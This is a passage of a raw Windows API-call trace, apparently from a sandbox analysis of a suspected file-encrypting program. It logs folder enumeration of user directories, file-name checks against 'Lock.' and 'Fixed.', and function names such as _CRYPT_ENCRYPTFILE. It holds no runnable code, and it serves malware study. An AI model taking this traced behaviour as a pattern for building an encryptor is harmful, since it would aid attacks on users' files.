hHeap=0x970000) returned 1 [0268.730] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.730] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.731] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.732] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.732] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0268.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0268.732] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.733] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0268.733] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.733] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.733] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0268.734] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.734] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.734] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.734] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.734] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.735] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.735] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.735] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0268.736] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.736] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.736] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.736] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.737] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.737] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.737] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.737] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0268.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.750] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xe07e8, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0268.751] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0268.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.753] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0268.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0268.753] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.755] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0268.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: 